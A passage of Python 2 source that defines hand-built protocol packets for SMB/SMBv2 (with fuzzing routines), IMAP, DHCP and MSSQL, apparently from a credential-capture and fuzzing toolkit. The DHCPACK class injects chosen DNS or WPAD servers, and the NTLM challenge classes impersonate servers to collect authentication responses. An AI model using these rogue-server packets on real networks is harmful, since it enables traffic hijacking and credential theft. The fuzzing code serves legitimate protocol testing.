("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"), ("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "SMB5.local"), ("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"), ("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"), ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "WIN-PRH502RQAFV.SMB5.local"), ("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"), ("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"), ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "SMB5.local"), ("NTLMSSPNTLMChallengeAVPairs7Id", "\x07\x00"), ("NTLMSSPNTLMChallengeAVPairs7Len", "\x08\x00"), ("NTLMSSPNTLMChallengeAVPairs7UnicodeStr", NTStamp(datetime.now())), ("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"), ("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"), ]) def calculate(self): ###### Convert strings to Unicode self.fields["NTLMSSPNtWorkstationName"] = self.fields[ "NTLMSSPNtWorkstationName"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le') self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields[ "NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le') #Packet struct calc: StructLen = str(self.fields["Len"]) + str( self.fields["SessionFlag"]) + str( self.fields["SecBlobOffSet"]) + str(self.fields["SecBlobLen"]) ###### SecBlobLen Calc: CalculateSecBlob = str(self.fields["NTLMSSPSignature"]) + str( self.fields["NTLMSSPSignatureNull"] ) + str(self.fields["NTLMSSPMessageType"]) + str( self.fields["NTLMSSPNtWorkstationLen"] ) + str(self.fields["NTLMSSPNtWorkstationMaxLen"]) + str( self.fields["NTLMSSPNtWorkstationBuffOffset"] ) + str(self.fields["NTLMSSPNtNegotiateFlags"]) + str( self.fields["NTLMSSPNtServerChallenge"] ) + str(self.fields["NTLMSSPNtReserved"]) + str( self.fields["NTLMSSPNtTargetInfoLen"]) + str( self.fields["NTLMSSPNtTargetInfoMaxLen"]) + str( self.fields["NTLMSSPNtTargetInfoBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"] ) + str(self.fields["NTLMSSPNtWorkstationName"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsId"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsLen"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Id"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs7Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] ) + str( self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) AsnLen = str(self.fields["ChoiceTagASNId"]) + str( self.fields["ChoiceTagASNLenOfLen"] ) + str(self.fields["ChoiceTagASNIdLen"]) + str( self.fields["NegTokenTagASNId"] ) + str(self.fields["NegTokenTagASNLenOfLen"]) + str( self.fields["NegTokenTagASNIdLen"] ) + str(self.fields["Tag0ASNId"]) + str( self.fields["Tag0ASNIdLen"]) + str( self.fields["NegoStateASNId"]) + str( self.fields["NegoStateASNLen"]) + str( self.fields["NegoStateASNValue"]) + str( self.fields["Tag1ASNId"]) + str( self.fields["Tag1ASNIdLen"]) + str( self.fields["Tag1ASNId2"]) + str( self.fields["Tag1ASNId2Len"]) + str( self.fields["Tag1ASNId2Str"] ) + str(self.fields["Tag2ASNId"]) + str( self.fields["Tag2ASNIdLenOfLen"] ) + str( self.fields["Tag2ASNIdLen"] ) + str( self.fields["Tag3ASNId"] ) + str( self.fields["Tag3ASNIdLenOfLen"] ) + str(self.fields["Tag3ASNIdLen"]) #Packet Struct len self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen + CalculateSecBlob)) self.fields["SecBlobOffSet"] = struct.pack("<h", len(StructLen) + 64) ###### ASN Stuff if len(CalculateSecBlob) > 255: self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob)) else: self.fields["Tag3ASNIdLenOfLen"] = "\x81" self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob)) if len(AsnLen + CalculateSecBlob) - 3 > 255: self.fields["ChoiceTagASNIdLen"] = struct.pack( ">H", len(AsnLen + CalculateSecBlob) - 4) else: self.fields["ChoiceTagASNLenOfLen"] = "\x81" self.fields["ChoiceTagASNIdLen"] = struct.pack( ">B", len(AsnLen + CalculateSecBlob) - 3) if len(AsnLen + CalculateSecBlob) - 7 > 255: self.fields["NegTokenTagASNIdLen"] = struct.pack( ">H", len(AsnLen + CalculateSecBlob) - 8) else: self.fields["NegTokenTagASNLenOfLen"] = "\x81" self.fields["NegTokenTagASNIdLen"] = struct.pack( ">B", len(AsnLen + CalculateSecBlob) - 7) tag2length = CalculateSecBlob + str(self.fields["Tag3ASNId"]) + str( self.fields["Tag3ASNIdLenOfLen"]) + str( self.fields["Tag3ASNIdLen"]) if len(tag2length) > 255: self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length)) else: self.fields["Tag2ASNIdLenOfLen"] = "\x81" self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length)) self.fields["Tag1ASNIdLen"] = struct.pack( ">B", len( str(self.fields["Tag1ASNId2"]) + str(self.fields["Tag1ASNId2Len"]) + str(self.fields["Tag1ASNId2Str"]))) self.fields["Tag1ASNId2Len"] = struct.pack( ">B", len(str(self.fields["Tag1ASNId2Str"]))) ###### Workstation Offset CalculateOffsetWorkstation = str( self.fields["NTLMSSPSignature"] ) + str(self.fields["NTLMSSPSignatureNull"]) + str( self.fields["NTLMSSPMessageType"] ) + str(self.fields["NTLMSSPNtWorkstationLen"]) + str( self.fields["NTLMSSPNtWorkstationMaxLen"] ) + str(self.fields["NTLMSSPNtWorkstationBuffOffset"]) + str( self.fields["NTLMSSPNtNegotiateFlags"] ) + str(self.fields["NTLMSSPNtServerChallenge"]) + str( self.fields["NTLMSSPNtReserved"]) + str( self.fields["NTLMSSPNtTargetInfoLen"]) + str( self.fields["NTLMSSPNtTargetInfoMaxLen"] ) + str( self.fields["NTLMSSPNtTargetInfoBuffOffset"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionHigh"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionLow"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionBuilt"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionReserved"] ) + str( self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]) ###### AvPairs Offset CalculateLenAvpairs = str( self.fields["NTLMSSPNTLMChallengeAVPairsId"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]) + ( self.fields["NTLMSSPNTLMChallengeAVPairs2Id"] ) + str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs7Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs7Len"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"] ) + (self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str( self.fields["NTLMSSPNTLMChallengeAVPairs6Len"]) ##### Workstation Offset Calculation: self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack( "<i", len(CalculateOffsetWorkstation)) self.fields["NTLMSSPNtWorkstationLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNtWorkstationName"]))) ##### Target Offset Calculation: self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack( "<i", len(CalculateOffsetWorkstation + str(self.fields["NTLMSSPNtWorkstationName"]))) self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack( "<h", len(CalculateLenAvpairs)) self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack( "<h", len(CalculateLenAvpairs)) ##### IvPair Calculation: self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]))) self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack( "<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class IMAPCapability(Packet): fields = OrderedDict([ ("Code", "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN"), ("CRLF", "\r\n"), ])
class IMAPCapabilityEnd(Packet): fields = OrderedDict([ ("Tag", ""), ("Message", " OK CAPABILITY completed."), ("CRLF", "\r\n"), ])
class SMBTransRAPData(Packet): fields = OrderedDict([ ("Wordcount", "\x0e"), ("TotalParamCount", "\x24\x00"), ("TotalDataCount", "\x00\x00"), ("MaxParamCount", "\x08\x00"), ("MaxDataCount", "\xff\xff"), ("MaxSetupCount", "\x00"), ("Reserved", "\x00\x00"), ("Flags", "\x00"), ("Timeout", "\x00\x00\x00\x00"), ("Reserved1", "\x00\x00"), ("ParamCount", "\x24\x00"), ("ParamOffset", "\x5a\x00"), ("DataCount", "\x00\x00"), ("DataOffset", "\x7e\x00"), ("SetupCount", "\x00"), ("Reserved2", "\x00"), ("Bcc", "\x3f\x00"), ("Terminator", "\x00"), ("PipeName", "\\PIPE\\LANMAN"), ("PipeTerminator", "\x00\x00"), ("Data", ""), ]) def calculate(self): #Padding if len(str(self.fields["Data"])) % 2 == 0: self.fields["PipeTerminator"] = "\x00\x00\x00\x00" else: self.fields["PipeTerminator"] = "\x00\x00\x00" ##Convert Path to Unicode first before any Len calc. self.fields["PipeName"] = self.fields["PipeName"].encode('utf-16le') ##Data Len self.fields["TotalParamCount"] = struct.pack( "<i", len(str(self.fields["Data"])))[:2] self.fields["ParamCount"] = struct.pack("<i", len(str( self.fields["Data"])))[:2] ##Packet len FindRAPOffset = str(self.fields["Wordcount"]) + str( self.fields["TotalParamCount"] ) + str(self.fields["TotalDataCount"]) + str( self.fields["MaxParamCount"] ) + str(self.fields["MaxDataCount"]) + str( self.fields["MaxSetupCount"] ) + str(self.fields["Reserved"]) + str(self.fields["Flags"]) + str( self.fields["Timeout"]) + str(self.fields["Reserved1"]) + str( self.fields["ParamCount"]) + str( self.fields["ParamOffset"]) + str( self.fields["DataCount"]) + str( self.fields["DataOffset"]) + str( self.fields["SetupCount"]) + str( self.fields["Reserved2"]) + str( self.fields["Bcc"]) + str( self.fields["Terminator"]) + str( self.fields["PipeName"]) + str( self. fields["PipeTerminator"]) self.fields["ParamOffset"] = struct.pack("<i", len(FindRAPOffset) + 32)[:2] ##Bcc Buff Len BccComplete = str(self.fields["Terminator"]) + str( self.fields["PipeName"]) + str( self.fields["PipeTerminator"]) + str(self.fields["Data"]) self.fields["Bcc"] = struct.pack("<i", len(BccComplete))[:2]
class IMAPGreating(Packet): fields = OrderedDict([ ("Code", "* OK IMAP4 service is ready."), ("CRLF", "\r\n"), ])
class SMBv2Header(Packet): fields = OrderedDict([ ("PreServer", "\xfe"), ("Server", "\x53\x4d\x42"), ("HeadLen", "\x40\x00"), ("CreditCharge", "\x00\x00"), ("NTStatus", "\x00\x00\x00\x00"), ("SMBv2Command", "\x00\x00"), ("CreditRequested", "\x00\x00"), ("Flags", "\x00\x00\x00\x00"), ("ChainOffset", "\x00\x00\x00\x00"), ("CommandSequence", "\x01\x00\x00\x00\x00\x00\x00\x00"), ("ProcessID", "\xff\xfe\x00\x00"), ("TreeID", "\x00\x00\x00\x00"), ("SessionID", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("Signature", "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"), ("Data", ""), ]) def calculateFuzz(self, n=1): fuzz = fuzzer() function = [ { "HeadLen": fuzz.DispatchPackets(self.fields["HeadLen"]) }, ] for i in range(n): result = choice(function) self.fields.update(result) print "CalculateFuzz updated this len in SMBv2Header:", result #Here we print what we actually altered, pretty useful when you get a crash. def PreFuzz(self, n=1): fuzz = fuzzer() function = [ { "PreServer": fuzz.DispatchPackets(self.fields["PreServer"]) }, { "Server": fuzz.DispatchPackets(self.fields["Server"]) }, { "SMBv2Command": fuzz.DispatchPackets(self.fields["SMBv2Command"]) }, { "CreditRequested": fuzz.DispatchPackets(self.fields["CreditRequested"]) }, { "Flags": fuzz.DispatchPackets(self.fields["Flags"]) }, { "ChainOffset": fuzz.DispatchPackets(self.fields["ChainOffset"]) }, { "CommandSequence": fuzz.DispatchPackets(self.fields["CommandSequence"]) }, { "ProcessID": fuzz.DispatchPackets(self.fields["ProcessID"]) }, { "TreeID": fuzz.DispatchPackets(self.fields["TreeID"]) }, { "SessionID": fuzz.DispatchPackets(self.fields["SessionID"]) }, { "Data": fuzz.DispatchPackets(self.fields["Data"]) }, ] for i in range(n): result = choice(function) self.fields.update(result) print "Pre Fuzz updated this field in SMB2 Header:", result
class SMB2Nego(Packet): fields = OrderedDict([ ("Len", "\x24\x00"), ("DialectCount", "\x05\x00"), ("SecurityMode", "\x01"), ("NullTerminator", "\x00\x00\x00"), ("Capabilities", "\x7f\x00\x00\x00"), ("ClientGUID", os.urandom(16)), ("NegoContextOffset", "\x70\x00\x00\x00"), ("NegoContextCount", "\x04\x00"), ("Reserved", "\x00\x00"), ("Dialects", "\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03"), ("Separator", "\x00\x00"), ("Context1Type", "\x01\x00"), ("Context1Len", "\x26\x00"), ("Context1Reserved", "\x00\x00\x00\x00"), ("Context1HashAlgoCount", "\x01\x00"), ("Context1SaltLen", "\x20\x00"), ("Context1HashAlgoType", "\x01\x00"), ("Context1Salt", "\x9d\x17\xd8\x0d\x2f\x57\xf1\xcd\x25\xbe\xb0\xac\x09\x6f\xab\x44\xa3\x79\x04\x88\x51\x22\xc4\xc1\xef\xc4\x65\xae\xd7\xe1\x6f\x98" ), ("Separator2", "\x00\x00"), ("Context2Type", "\x02\x00"), ("Context2Len", "\x06\x00"), ("Context2Reserved", "\x00\x00\x00\x00"), ("Context2CipherCount", "\x02\x00"), ("Context2Cipher1", "\x02\x00"), ("Context2Cipher2", "\x01\x00"), ("Separator4", "\x00\x00"), ("Context4Type", "\x03\x00"), ("Context4Len", "\x0e\x00"), ("Context4Reserved", "\x00\x00\x00\x00"), ("Context4Data", "\x03\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00"), ("Separator3", "\x00\x00"), ("Context3Type", "\x05\x00"), ("Context3Len", "\x1a\x00"), ("Context3Reserved", "\x00\x00\x00\x00"), ("Context3NetName", "192.168.0.176"), #your IP. ( "Data", "" ), # We can add this field at the end of the packet so we're able to add some fuzzed data at the end of the packet and have all the lenghts correct. ]) def calculate(self): self.fields["NegoContextOffset"] = struct.pack( "<L", len(self.fields["NegoContextCount"] + self.fields["Reserved"] + self.fields["Dialects"] + self.fields["Separator"]) + 96) # Context offset. self.fields["Context3NetName"] = self.fields["Context3NetName"].encode( 'utf-16le') self.fields["Context3Len"] = struct.pack( "<H", len(str(self.fields["Context3NetName"]))) self.fields["Context4Len"] = struct.pack( "<H", len(str(self.fields["Context4Data"]))) #### self.fields["Context1SaltLen"] = struct.pack( "<H", len(str(self.fields["Context1Salt"]))) Context1DataLen = str(self.fields["Context1HashAlgoCount"]) + str( self.fields["Context1SaltLen"]) + str( self.fields["Context1HashAlgoType"]) + str( self.fields["Context1Salt"]) self.fields["Context1Len"] = struct.pack("<H", len(Context1DataLen)) Context2Len = str(self.fields["Context2CipherCount"]) + str( self.fields["Context2Cipher1"]) + str( self.fields["Context2Cipher2"]) self.fields["Context2Len"] = struct.pack("<H", len(Context2Len)) ####DialectCount.... self.fields["DialectCount"] = struct.pack( "<H", len(str(self.fields["Dialects"])) / 2) def calculateFuzz(self, n=1): #Here we only fuzz length fields after the right calculation. fuzz = fuzzer() function = [ { "NegoContextOffset": fuzz.DispatchPackets(self.fields["NegoContextOffset"]) }, { "NegoContextCount": fuzz.DispatchPackets(self.fields["NegoContextCount"]) }, { "DialectCount": fuzz.DispatchPackets(self.fields["DialectCount"]) }, { "Context1Len": fuzz.DispatchPackets(self.fields["Context1Len"]) }, { "Context1SaltLen": fuzz.DispatchPackets(self.fields["Context1SaltLen"]) }, { "Context2CipherCount": fuzz.DispatchPackets(self.fields["Context2CipherCount"]) }, { "Context2Len": fuzz.DispatchPackets(self.fields["Context2Len"]) }, { "Context3Len": fuzz.DispatchPackets(self.fields["Context3Len"]) }, { "Context4Len": fuzz.DispatchPackets(self.fields["Context4Len"]) }, ] for i in range(n): result = choice(function) self.fields.update(result) print "CalculateFuzz updated this len in Nego Data:", result def PreFuzz(self, n=1): fuzz = fuzzer() function = [ #{"Len": fuzz.DispatchPackets(self.fields["Len"])}, # in SMB2, fuzzing this len is irrelevant, just like wordcount in smbv1. #{"DialectCount": fuzz.DispatchPackets(self.fields["DialectCount"])}, #Already fuzzed in calculateFuzz() { "SecurityMode": fuzz.DispatchPackets(self.fields["SecurityMode"]) }, { "Capabilities": fuzz.DispatchPackets(self.fields["Capabilities"]) }, #{"Reserved": fuzz.DispatchPackets(self.fields["Reserved"])}, { "Dialects": fuzz.DispatchPackets(self.fields["Dialects"]) }, { "Separator": fuzz.DispatchPackets(self.fields["Separator"]) }, { "Context1Type": fuzz.DispatchPackets(self.fields["Context1Type"]) }, { "Context1Reserved": fuzz.DispatchPackets(self.fields["Context1Reserved"]) }, { "Context1HashAlgoCount": fuzz.DispatchPackets(self.fields["Context1HashAlgoCount"]) }, { "Context1HashAlgoType": fuzz.DispatchPackets(self.fields["Context1HashAlgoType"]) }, { "Context1Salt": fuzz.DispatchPackets(self.fields["Context1Salt"]) }, { "Separator2": fuzz.DispatchPackets(self.fields["Separator2"]) }, { "Context2Type": fuzz.DispatchPackets(self.fields["Context2Type"]) }, { "Context2Reserved": fuzz.DispatchPackets(self.fields["Context2Reserved"]) }, { "Context2CipherCount": fuzz.DispatchPackets(self.fields["Context2CipherCount"]) }, { "Context2Cipher1": fuzz.DispatchPackets(self.fields["Context2Cipher1"]) }, { "Context2Cipher2": fuzz.DispatchPackets(self.fields["Context2Cipher2"]) }, { "Context4Data": fuzz.DispatchPackets(self.fields["Context4Data"]) }, { "Context3NetName": fuzz.DispatchPackets(self.fields["Context3NetName"]) }, { "Data": fuzz.DispatchPackets(self.fields["Data"]) }, ] for i in range(n): result = choice(function) self.fields.update(result) print "Pre Fuzz updated this field in SMB2 Nego Data:", result
class DHCPACK(Packet): fields = OrderedDict([ ("MessType", "\x02"), ("HdwType", "\x01"), ("HdwLen", "\x06"), ("Hops", "\x00"), ("Tid", "\x11\x22\x33\x44"), ("ElapsedSec", "\x00\x00"), ("BootpFlags", "\x00\x00"), ("ActualClientIP", "\x00\x00\x00\x00"), ("GiveClientIP", "\x00\x00\x00\x00"), ("NextServerIP", "\x00\x00\x00\x00"), ("RelayAgentIP", "\x00\x00\x00\x00"), ("ClientMac", "\xff\xff\xff\xff\xff\xff"), ("ClientMacPadding", "\x00" * 10), ("ServerHostname", "\x00" * 64), ("BootFileName", "\x00" * 128), ("MagicCookie", "\x63\x82\x53\x63"), ("DHCPCode", "\x35"), #DHCP Message ("DHCPCodeLen", "\x01"), ("DHCPOpCode", "\x05"), #Msgtype(ACK) ("Op54", "\x36"), ("Op54Len", "\x04"), ("Op54Str", ""), #DHCP Server ("Op51", "\x33"), ("Op51Len", "\x04"), ("Op51Str", "\x00\x00\x00\x0a"), #Lease time ("Op1", "\x01"), ("Op1Len", "\x04"), ("Op1Str", ""), #Netmask ("Op15", "\x0f"), ("Op15Len", "\x0e"), ("Op15Str", ""), #DNS Name ("Op3", "\x03"), ("Op3Len", "\x04"), ("Op3Str", ""), #Router ("Op6", "\x06"), ("Op6Len", "\x08"), ("Op6Str", ""), #DNS Servers ("Op252", ""), ("Op252Len", ""), ("Op252Str", ""), #Wpad Server ("Op255", "\xff"), ("Padding", "\x00"), ]) def calculate(self, DHCP_DNS): self.fields["Op54Str"] = socket.inet_aton(ROUTERIP).decode('latin-1') self.fields["Op1Str"] = socket.inet_aton(NETMASK).decode('latin-1') self.fields["Op3Str"] = socket.inet_aton(ROUTERIP).decode('latin-1') self.fields["Op6Str"] = socket.inet_aton(DNSIP).decode( 'latin-1') + socket.inet_aton(DNSIP2).decode('latin-1') self.fields["Op15Str"] = DNSNAME if DHCP_DNS: self.fields["Op6Str"] = socket.inet_aton(RespondWithIP()).decode( 'latin-1') + socket.inet_aton(DNSIP2).decode('latin-1') else: self.fields["Op252"] = "\xfc" self.fields["Op252Str"] = WPADSRV self.fields["Op252Len"] = StructWithLenPython2or3( ">b", len(str(self.fields["Op252Str"]))) self.fields["Op51Str"] = StructWithLenPython2or3( '>L', random.randrange(10, 20)) self.fields["Op15Len"] = StructWithLenPython2or3( ">b", len(str(self.fields["Op15Str"])))
class MSSQLNTLMChallengeAnswer(Packet): fields = OrderedDict([ ("PacketType", "\x04"), ("Status", "\x01"), ("Len", "\x00\xc7"), ("SPID", "\x00\x00"), ("PacketID", "\x01"), ("Window", "\x00"), ("TokenType", "\xed"), ("SSPIBuffLen", "\xbc\x00"), ("Signature", "NTLMSSP"), ("SignatureNull", "\x00"), ("MessageType", "\x02\x00\x00\x00"), ("TargetNameLen", "\x06\x00"), ("TargetNameMaxLen", "\x06\x00"), ("TargetNameOffset", "\x38\x00\x00\x00"), ("NegoFlags", "\x05\x02\x89\xa2"), ("ServerChallenge", ""), ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), ("TargetInfoLen", "\x7e\x00"), ("TargetInfoMaxLen", "\x7e\x00"), ("TargetInfoOffset", "\x3e\x00\x00\x00"), ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), ("TargetNameStr", "SMB"), ("Av1", "\x02\x00"), #nbt name ("Av1Len", "\x06\x00"), ("Av1Str", "SMB"), ("Av2", "\x01\x00"), #Server name ("Av2Len", "\x14\x00"), ("Av2Str", "SMB-TOOLKIT"), ("Av3", "\x04\x00"), #Full Domain name ("Av3Len", "\x12\x00"), ("Av3Str", "smb.local"), ("Av4", "\x03\x00"), #Full machine domain name ("Av4Len", "\x28\x00"), ("Av4Str", "server2003.smb.local"), ("Av5", "\x05\x00"), #Domain Forest Name ("Av5Len", "\x12\x00"), ("Av5Str", "smb.local"), ("Av6", "\x00\x00"), #AvPairs Terminator ("Av6Len", "\x00\x00"), ]) def calculate(self): ##First convert to uni self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode( 'utf-16le') self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le') self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') ##Then calculate CalculateCompletePacket = str(self.fields["PacketType"]) + str( self.fields["Status"] ) + str(self.fields["Len"]) + str(self.fields["SPID"]) + str( self.fields["PacketID"] ) + str(self.fields["Window"]) + str(self.fields["TokenType"]) + str( self.fields["SSPIBuffLen"]) + str(self.fields["Signature"]) + str( self.fields["SignatureNull"]) + str( self.fields["MessageType"]) + str( self.fields["TargetNameLen"]) + str( self.fields["TargetNameMaxLen"]) + str( self.fields["TargetNameOffset"]) + str( self.fields["NegoFlags"]) + str( self.fields["ServerChallenge"]) + str( self.fields["Reserved"]) + str( self.fields["TargetInfoLen"] ) + str( self.fields["TargetInfoMaxLen"] ) + str( self.fields["TargetInfoOffset"] ) + str( self.fields["NTLMOsVersion"] ) + str( self.fields["TargetNameStr"] ) + str(self.fields["Av1"]) + str( self.fields["Av1Len"]) + str( self.fields["Av1Str"] ) + str( self.fields["Av2"]) + str( self.fields["Av2Len"] ) + str( self.fields["Av2Str"] ) + str( self.fields["Av3"] ) + str( self.fields["Av3Len"] ) + str( self.fields["Av3Str"] ) + str( self.fields["Av4"] ) + str( self.fields["Av4Len"] ) + str( self.fields["Av4Str"] ) + str( self.fields["Av5"] ) + str( self.fields["Av5Len"] ) + str( self.fields["Av5Str"] ) + str( self.fields["Av6"] ) + str( self.fields["Av6Len"]) CalculateSSPI = str(self.fields["Signature"]) + str( self.fields["SignatureNull"] ) + str(self.fields["MessageType"]) + str( self.fields["TargetNameLen"] ) + str(self.fields["TargetNameMaxLen"]) + str( self.fields["TargetNameOffset"] ) + str(self.fields["NegoFlags"]) + str( self.fields["ServerChallenge"]) + str( self.fields["Reserved"]) + str( self.fields["TargetInfoLen"]) + str( self.fields["TargetInfoMaxLen"]) + str( self.fields["TargetInfoOffset"]) + str( self.fields["NTLMOsVersion"]) + str( self.fields["TargetNameStr"]) + str( self.fields["Av1"]) + str( self.fields["Av1Len"]) + str( self.fields["Av1Str"]) + str( self.fields["Av2"]) + str( self.fields["Av2Len"] ) + str( self.fields["Av2Str"] ) + str( self.fields["Av3"] ) + str( self.fields["Av3Len"] ) + str( self.fields["Av3Str"] ) + str( self.fields["Av4"] ) + str( self.fields["Av4Len"] ) + str( self.fields["Av4Str"] ) + str( self.fields["Av5"] ) + str( self.fields["Av5Len"] ) + str( self.fields["Av5Str"] ) + str( self.fields["Av6"] ) + str( self.fields["Av6Len"]) CalculateNameOffset = str(self.fields["Signature"]) + str( self.fields["SignatureNull"] ) + str(self.fields["MessageType"]) + str( self.fields["TargetNameLen"] ) + str(self.fields["TargetNameMaxLen"]) + str( self.fields["TargetNameOffset"]) + str( self.fields["NegoFlags"]) + str( self.fields["ServerChallenge"]) + str( self.fields["Reserved"]) + str( self.fields["TargetInfoLen"]) + str( self.fields["TargetInfoMaxLen"]) + str( self.fields["TargetInfoOffset"]) + str( self.fields["NTLMOsVersion"]) CalculateAvPairsOffset = CalculateNameOffset + str( self.fields["TargetNameStr"]) CalculateAvPairsLen = str(self.fields["Av1"]) + str( self.fields["Av1Len"] ) + str(self.fields["Av1Str"]) + str(self.fields["Av2"]) + str( self.fields["Av2Len"]) + str(self.fields["Av2Str"]) + str( self.fields["Av3"]) + str(self.fields["Av3Len"]) + str( self.fields["Av3Str"]) + str(self.fields["Av4"]) + str( self.fields["Av4Len"]) + str( self.fields["Av4Str"]) + str( self.fields["Av5"]) + str( self.fields["Av5Len"]) + str( self.fields["Av5Str"]) + str( self.fields["Av6"]) + str( self.fields["Av6Len"]) 